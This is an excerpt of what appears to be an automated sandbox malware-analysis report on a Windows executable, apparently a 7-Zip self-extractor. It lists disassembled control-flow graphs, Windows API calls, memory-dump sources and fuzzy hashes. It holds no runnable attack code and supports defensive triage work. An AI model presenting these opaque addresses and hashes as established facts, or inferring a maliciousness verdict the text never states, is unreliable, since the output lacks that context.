                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                    • String ID:
                                                                    • API String ID: 846840743-0
                                                                    • Opcode ID: 44ccc78e6b35b3404b31794eba43600d3e63f6a28556bb8e765a0a445c807f12
                                                                    • Instruction ID: 91e79cb9f272e0fc84db3cde8408d575c4b848c544f3ea2b05d11415b181eedc
                                                                    • Opcode Fuzzy Hash: 44ccc78e6b35b3404b31794eba43600d3e63f6a28556bb8e765a0a445c807f12
                                                                    • Instruction Fuzzy Hash: 0841B6B6900211A6DB20BF598845BBFBABCEF41706F50813BF941B32C5D77C9A4282DD

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 905 40f227-40f26f _EH_prolog call 40ef4a 908 40f271-40f274 905->908 909 40f277-40f27a 905->909 908->909 910 40f290-40f2b5 909->910 911 40f27c-40f281 909->911 914 40f2b7-40f2bd 910->914 912 40f283-40f285 911->912 913 40f289-40f28b 911->913 912->913 915 40f6f3-40f704 913->915 916 40f2c3-40f2c7 914->916 917 40f387-40f393 call 4011d1 914->917 918 40f2c9-40f2cc 916->918 919 40f2cf-40f2de 916->919 920 40f396-40f39a 917->920 918->919 921 40f2e0-40f2f6 call 40f040 call 40f1fd call 40ce5c 919->921 922 40f303-40f308 919->922 925 40f3b1-40f3d6 call 40e891 ??2@YAPAXI@Z 920->925 926 40f39c-40f3a6 call 40ef85 920->926 942 40f2fb-40f301 921->942 923 40f316-40f350 call 40f040 call 40f1fd call 40ce5c call 40f117 922->923 924 40f30a-40f314 922->924 928 40f353-40f369 923->928 924->923 924->928 939 40f3e1-40f3fa call 40ef4a call 40dc14 925->939 940 40f3d8-40f3df call 40dce7 925->940 948 40f3aa-40f3ac 926->948 936 40f36c-40f374 928->936 941 40f376-40f385 call 40ef63 936->941 936->942 958 40f3fd-40f420 call 40dc09 939->958 940->939 941->936 942->914 948->915 962 40f422-40f427 958->962 963 40f456-40f459 958->963 966 40f429-40f42b 962->966 967 40f42f-40f447 call 40f090 call 40ef85 962->967 964 40f485-40f4a9 ??2@YAPAXI@Z 963->964 965 40f45b-40f460 963->965 971 40f4b4 964->971 972 40f4ab-40f4b2 call 40f776 964->972 968 40f462-40f464 965->968 969 40f468-40f47e call 40f090 call 40ef85 965->969 966->967 984 40f449-40f44b 967->984 985 40f44f-40f451 967->985 968->969 969->964 973 40f4b6-40f4cd call 40ef4a 971->973 972->973 986 40f4db-40f500 call 40faff 973->986 987 40f4cf-40f4d8 973->987 984->985 985->915 991 40f502-40f507 986->991 992 40f543-40f546 986->992 987->986 995 40f509-40f50b 991->995 996 40f50f-40f514 991->996 993 40f54c-40f5b3 call 40f163 call 40f011 call 40e9ef 992->993 994 40f6ae-40f6b3 992->994 1013 40f615-40f61b 993->1013 1014 40f5b5 993->1014 997 40f6b5-40f6b6 994->997 998 40f6bb-40f6df 994->998 995->996 1000 40f516-40f518 996->1000 1001 40f51c-40f534 call 40f090 call 40ef85 996->1001 997->998 998->915 998->958 1000->1001 1010 40f536-40f538 1001->1010 1011 40f53c-40f53e 1001->1011 1010->1011 1011->915 1016 40f621-40f623 1013->1016 1017 40f61d-40f61f 1013->1017 1015 40f5b7 1014->1015 1018 40f5ba-40f5c3 call 40faac 1015->1018 1019 40f5c5-40f5c7 1016->1019 1020 40f625-40f631 1016->1020 1017->1015 1018->1019 1030 40f602-40f604 1018->1030 1022 40f5c9-40f5ca 1019->1022 1023 40f5cf-40f5d1 1019->1023 1024 40f633-40f635 1020->1024 1025 40f637-40f63d 1020->1025 1022->1023 1027 40f5d3-40f5d5 1023->1027 1028 40f5d9-40f5f1 call 40f090 call 40ef85 1023->1028 1024->1018 1025->998 1029 40f63f-40f645 1025->1029 1027->1028 1028->948 1038 40f5f7-40f5fd 1028->1038 1029->998 1032 40f606-40f608 1030->1032 1033 40f60c-40f610 1030->1033 1032->1033 1033->998 1038->948
                                                                    APIs
                                                                    • _EH_prolog.MSVCRT ref: 0040F230
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040F3CE
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000038,00000000,00000001), ref: 0040F4A1
                                                                      • Part of subcall function 0040F776: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,0040F4B2,00000000,00000001), ref: 0040F79E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$H_prolog
                                                                    • String ID: pmA${D@
                                                                    • API String ID: 3431946709-901781089
                                                                    • Opcode ID: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction ID: 4b0d62aee0caa64fe906b0c8bb83bc11348460c21612f4a75cf9423b72749376
                                                                    • Opcode Fuzzy Hash: 5f2616ad24b74ab3b3c53048b37fa2c0e98c535542d0e7834049dc9cf8634cb0
                                                                    • Instruction Fuzzy Hash: 27F14971600209DFCB24DF65C884AAA77E5BF48314F24417AFC15AB7A2DB39EC4ACB54

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1041 401b75-401b84 CreateDirectoryW 1042 401bb6-401bba 1041->1042 1043 401b86-401b93 GetLastError 1041->1043 1044 401ba0-401bad GetFileAttributesW 1043->1044 1045 401b95 1043->1045 1044->1042 1047 401baf-401bb1 1044->1047 1046 401b96-401b9f SetLastError 1045->1046 1047->1042 1048 401bb3-401bb4 1047->1048 1048->1046
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(k7@,00000000,-00000001,0040376B,?,004017CF,?,?,?,?,004017CF,?), ref: 00401B7C
                                                                    • GetLastError.KERNEL32(?,?,?,?,004017CF,?), ref: 00401B86
                                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,004017CF,?), ref: 00401B96
                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 00401BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                    • String ID: k7@
                                                                    • API String ID: 635176117-1561861239
                                                                    • Opcode ID: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction ID: 71014ff69d247b10dec1bc4f18777740662f48cc5fd99e7c756ec1d8f22ae331
                                                                    • Opcode Fuzzy Hash: 7fa23999d3db3281292cd00d2626ae9ff6d2ad14d17e5580772b07dc82ab3e50
                                                                    • Instruction Fuzzy Hash: 72E04831918510EFDB125B34FC48BDF7B659F85365F908672F459E01F4E3749C428549

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1052 40e9ef-40ea0a call 410a40 1055 40ea19-40ea52 call 406eb0 call 40f707 1052->1055 1056 40ea0c-40ea16 1052->1056 1061 40eb20-40eb46 call 40e79c call 40e6d7 1055->1061 1062 40ea58-40ea62 ??2@YAPAXI@Z 1055->1062 1074 40eb64-40eb7c call 40cdda call 401132 1061->1074 1075 40eb48-40eb5e call 40e2e8 1061->1075 1064 40ea71 1062->1064 1065 40ea64-40ea6f 1062->1065 1066 40ea73-40eaac call 40ef4a ??2@YAPAXI@Z 1064->1066 1065->1066 1072 40eabe 1066->1072 1073 40eaae-40eabc 1066->1073 1076 40eac0-40eaf9 call 40ef4a call 40c350 call 40e45f 1072->1076 1073->1076 1089 40ebb4-40ebc4 1074->1089 1090 40eb7e-40eb8b ??2@YAPAXI@Z 1074->1090 1075->1074 1083 40ece0-40ecf7 1075->1083 1105 40eb01-40eb06 1076->1105 1106 40eafb-40eafd 1076->1106 1094 40ee93-40eeae call 40e27a 1083->1094 1095 40ecfd 1083->1095 1107 40ebf4-40ebfa 1089->1107 1108 40ebc6 1089->1108 1091 40eb96 1090->1091 1092 40eb8d-40eb94 call 40e7c1 1090->1092 1097 40eb98-40eba8 call 40f707 1091->1097 1092->1097 1111 40eeb0-40eeb6 1094->1111 1112 40eeb9-40eebc 1094->1112 1101 40ed00-40ed30 1095->1101 1120 40ebaa-40ebad 1097->1120 1121 40ebaf 1097->1121 1118 40ed60-40eda6 call 40cd11 * 2 1101->1118 1119 40ed32-40ed38 1101->1119 1116 40eb08-40eb0a 1105->1116 1117 40eb0e-40eb1a 1105->1117 1106->1105 1113 40ec00-40ec20 call 40cf2f 1107->1113 1114 40ecce-40ecdd call 40e977 1107->1114 1115 40ebc8-40ebee call 40ce5c call 40e2c5 call 40e42c call 40e4dd 1108->1115 1111->1112 1112->1115 1123 40eec2-40eee9 call 40cd11 1112->1123 1133 40ec25-40ec2d 1113->1133 1114->1083 1115->1107 1116->1117 1117->1061 1117->1062 1163 40ee10 1118->1163 1164 40eda8-40edab 1118->1164 1127 40ee00-40ee02 1119->1127 1128 40ed3e-40ed50 1119->1128 1129 40ebb1 1120->1129 1121->1129 1145 40ef01-40ef1d 1123->1145 1146 40eeeb-40eeff call 4107a2 1123->1146 1139 40ee06-40ee0b 1127->1139 1150 40ed56-40ed58 1128->1150 1151 40edda-40eddc 1128->1151 1129->1089 1137 40ec33-40ec3a 1133->1137 1138 40edca-40edcf 1133->1138 1147 40ec68-40ec6b 1137->1147 1148 40ec3c-40ec40 1137->1148 1141 40edd1-40edd3 1138->1141 1142 40edd7 1138->1142 1139->1115 1141->1142 1142->1151 1217 40ef1e call 40bb40 1145->1217 1218 40ef1e call 40c5e0 1145->1218 1219 40ef1e call 40e17a 1145->1219 1220 40ef1e call 41297c 1145->1220 1146->1145 1152 40ec71-40ec7f call 40f707 1147->1152 1153 40edf9-40edfe 1147->1153 1148->1147 1156 40ec42-40ec45 1148->1156 1150->1118 1159 40ed5a-40ed5c 1150->1159 1160 40ede4-40ede7 1151->1160 1161 40edde-40ede0 1151->1161 1180 40ec81-40ec87 call 413226 1152->1180 1181 40ec8c-40ec9d call 40e45f 1152->1181 1153->1127 1153->1139 1166 40ec4b-40ec59 call 40f707 1156->1166 1167 40edec-40edf1 1156->1167 1157 40ef21-40ef2b call 40ce5c 1157->1115 1159->1118 1160->1115 1161->1160 1169 40ee13-40ee19 1163->1169 1174 40edae-40edc6 call 4107a2 1164->1174 1166->1181 1184 40ec5b-40ec66 call 413201 1166->1184 1167->1139 1173 40edf3-40edf5 1167->1173 1176 40ee64-40ee8d call 40ce5c * 2 1169->1176 1177 40ee1b-40ee27 call 40e558 1169->1177 1173->1153 1189 40edc8 1174->1189 1176->1094 1176->1101 1195 40ee35-40ee41 call 40e5a3 1177->1195 1196 40ee29-40ee33 1177->1196 1180->1181 1197 40eca5-40ecaa 1181->1197 1198 40ec9f-40eca1 1181->1198 1184->1181 1189->1169 1210 40ef30-40ef45 call 40ce5c * 2 1195->1210 1211 40ee47 1195->1211 1202 40ee4a-40ee62 call 4107a2 1196->1202 1199 40ecb2-40ecb7 1197->1199 1200 40ecac-40ecae 1197->1200 1198->1197 1205 40ecb9-40ecbb 1199->1205 1206 40ecbf-40ecc8 1199->1206 1200->1199 1202->1176 1202->1177 1205->1206 1206->1113 1206->1114 1210->1115 1211->1202 1217->1157 1218->1157 1219->1157 1220->1157
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID: DmA${D@
                                                                    • API String ID: 1033339047-1777112864
                                                                    • Opcode ID: 74c9a902782fff8892ef430172d3eabf3bdf310a24e7e9e2568896a4ddffddf4
                                                                    • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                    • Opcode Fuzzy Hash: 74c9a902782fff8892ef430172d3eabf3bdf310a24e7e9e2568896a4ddffddf4
                                                                    • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1221 410ccb-410ce8 call 40e0d0 1224 410e20-410e23 1221->1224 1225 410cee-410cf5 call 41076b 1221->1225 1228 410cf7-410cf9 1225->1228 1229 410cfe-410d2d call 40e036 memcpy 1225->1229 1228->1224 1232 410d30-410d38 1229->1232 1233 410d50-410d68 1232->1233 1234 410d3a-410d48 1232->1234 1240 410d6a-410d6f 1233->1240 1241 410dcf 1233->1241 1235 410dc4-410dcd ??3@YAXPAX@Z 1234->1235 1236 410d4a 1234->1236 1238 410e1e-410e1f 1235->1238 1236->1233 1237 410d4c-410d4e 1236->1237 1237->1233 1237->1235 1238->1224 1243 410d71-410d79 1240->1243 1244 410dd4-410dd7 1240->1244 1242 410dd1-410dd2 1241->1242 1245 410e17-410e1c ??3@YAXPAX@Z 1242->1245 1246 410d7b 1243->1246 1247 410dad-410dbf memmove 1243->1247 1244->1242 1245->1238 1248 410d8a-410d8e 1246->1248 1247->1232 1249 410d90-410d92 1248->1249 1250 410d82-410d84 1248->1250 1249->1247 1252 410d94-410d9d call 41076b 1249->1252 1250->1247 1251 410d86-410d87 1250->1251 1251->1248 1255 410dd9-410e15 memcpy call 40d041 1252->1255 1256 410d9f-410dab 1252->1256 1255->1245 1256->1247 1257 410d7d-410d80 1256->1257 1257->1248
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                    • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@memcpymemmove
                                                                    • String ID:
                                                                    • API String ID: 3549172513-0
                                                                    • Opcode ID: 8619cfb4006b12d67c02153b720c73a7f55ec6f7673dbbb61edd29a6b56e383a
                                                                    • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                    • Opcode Fuzzy Hash: 8619cfb4006b12d67c02153b720c73a7f55ec6f7673dbbb61edd29a6b56e383a
                                                                    • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1273 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1292 404989-40499d SHGetSpecialFolderPathW 1273->1292 1293 404a32-404a36 1292->1293 1294 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1292->1294 1293->1292 1295 404a3c-404a40 1293->1295 1305 4049f2-4049f8 1294->1305 1306 404a22-404a28 1305->1306 1307 4049fa-404a1d call 401370 * 2 call 4032d9 1305->1307 1306->1305 1309 404a2a-404a2d call 40269a 1306->1309 1307->1306 1309->1293
                                                                    APIs
                                                                    • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                      • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                      • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                      • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                      • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                      • Part of subcall function 00402187: lstrcmpiW.KERNEL32(025649B0,00404926), ref: 0040224B
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(025649B0), ref: 0040225B
                                                                      • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                      • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                      • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                      • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                      • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                      • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                      • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,025649B0,00000002), ref: 00402334
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                    • wsprintfW.USER32 ref: 004049B0
                                                                      • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                    • String ID: 7zSfxFolder%02d
                                                                    • API String ID: 3387708999-2820892521
                                                                    • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                    • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                    • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1315 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1319 402c3d-402c59 call 40d00d 1315->1319 1321 402d29 1319->1321 1322 402c5f-402c64 1319->1322 1323 402d2b-402d2f 1321->1323 1322->1321 1324 402c6a-402c74 1322->1324 1325 402c77-402c7c 1324->1325 1326 402cbb-402cc0 1325->1326 1327 402c7e-402c83 1325->1327 1328 402ce5-402d09 memmove 1326->1328 1330 402cc2-402cd5 memcmp 1326->1330 1327->1328 1329 402c85-402c98 memcmp 1327->1329 1335 402d18-402d23 1328->1335 1336 402d0b-402d12 1328->1336 1331 402d25-402d27 1329->1331 1332 402c9e-402ca8 1329->1332 1333 402cb5-402cb9 1330->1333 1334 402cd7-402ce3 1330->1334 1331->1323 1332->1321 1337 402caa-402cb0 call 40292b 1332->1337 1333->1325 1334->1325 1335->1323 1336->1335 1338 402c3a 1336->1338 1337->1333 1338->1319
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                    • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                    • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                    • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                    • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlenmemcmp$memmove
                                                                    • String ID:
                                                                    • API String ID: 3251180759-0
                                                                    • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                    • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                    • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1342 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1349 401669 call 40851f 1342->1349 1350 40166e-401689 WaitForSingleObject 1342->1350 1349->1350 1352 40168b-40168e 1350->1352 1353 4016bd-4016c3 1350->1353 1356 401690-401693 1352->1356 1357 4016b1 1352->1357 1354 401721 1353->1354 1355 4016c5-4016da GetExitCodeThread 1353->1355 1363 401726-401729 1354->1363 1358 4016e4-4016ef 1355->1358 1359 4016dc-4016de 1355->1359 1360 401695-401698 1356->1360 1361 4016ad-4016af 1356->1361 1362 4016b3-4016bb call 408dbf 1357->1362 1365 4016f1-4016f2 1358->1365 1366 4016f7-401700 1358->1366 1359->1358 1364 4016e0-4016e2 1359->1364 1367 4016a9-4016ab 1360->1367 1368 40169a-40169d 1360->1368 1361->1362 1362->1354 1364->1363 1370 4016f4-4016f5 1365->1370 1371 401702-401709 1366->1371 1372 40170b-401717 SetLastError 1366->1372 1367->1362 1373 4016a4-4016a7 1368->1373 1374 40169f-4016a2 1368->1374 1376 401719-40171e call 408dbf 1370->1376 1371->1354 1371->1372 1372->1376 1373->1370 1374->1354 1374->1373 1376->1354
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                    • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                      • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                      • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                      • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                      • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                      • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                      • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                      • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                      • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd
                                                                    Similarity
                                                                    • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                    • String ID:
                                                                    • API String ID: 359084233-0
                                                                    • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                    • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                    • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1379 404545-404576 call 401458 call 4027aa GetTempPathW 1384 404598-4045a5 1379->1384 1385 404578-404595 call 4027aa GetTempPathW call 40115e 1379->1385 1387 4045a8-4045df call 4027aa wsprintfW call 40115e GetFileAttributesW 1384->1387 1385->1384 1395 4045e1-4045eb 1387->1395 1396 4045ed-4045f3 1387->1396 1395->1387 1395->1396
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                    • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                    • wsprintfW.USER32 ref: 004045BB
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
